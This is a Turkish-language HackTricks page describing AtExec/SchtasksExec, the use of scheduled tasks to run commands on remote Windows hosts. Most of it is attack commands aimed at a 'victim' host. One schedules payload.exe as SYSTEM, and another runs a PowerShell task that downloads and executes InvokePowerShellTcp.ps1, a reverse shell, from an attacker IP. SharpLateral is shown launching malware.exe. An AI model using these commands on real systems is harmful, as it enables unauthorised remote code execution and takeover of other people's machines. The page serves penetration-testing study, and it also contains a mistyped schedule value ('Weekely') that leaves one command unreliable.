hacktricks/windows-hardening/ntlm/atexec.md
2024-02-10 18:14:16 +00:00

3.7 KiB
Raw Blame History

AtExec / SchtasksExec

AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ı öğrenin!

HackTricks'ı desteklemenin diğer yolları:

Nasıl Çalışır

At, kullanıcı adı/(parola/Hash) bilinen ana bilgisayarlarda görevleri zamanlamak için kullanılır. Bu nedenle, başka ana bilgisayarlarda komutları çalıştırmak ve çıktıyı almak için kullanılabilirsiniz.

At \\victim 11:00:00PM shutdown -r

schtask /create /tn "TaskName" /tr "C:\path\to\payload.exe" /sc ONLOGON /ru "SYSTEM" schtasks /run /tn "TaskName" {% endcode %}

This will create a new task named "TaskName" that will execute the payload.exe file located at "C:\path\to\payload.exe" every time the system logs on. Then, the second command will run the task immediately.

Note: The task will be executed with SYSTEM privileges.

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>

{% code overflow="wrap" %}

schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

Ayrıca SharpLateral kullanabilirsiniz:

{% code overflow="wrap" %}

SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

{% endcode %}

Gümüş biletlerle schtasks kullanımı hakkında daha fazla bilgi için buraya tıklayın.

AWS hacklemeyi sıfırdan kahraman olmaya kadar öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!

HackTricks'i desteklemenin diğer yolları: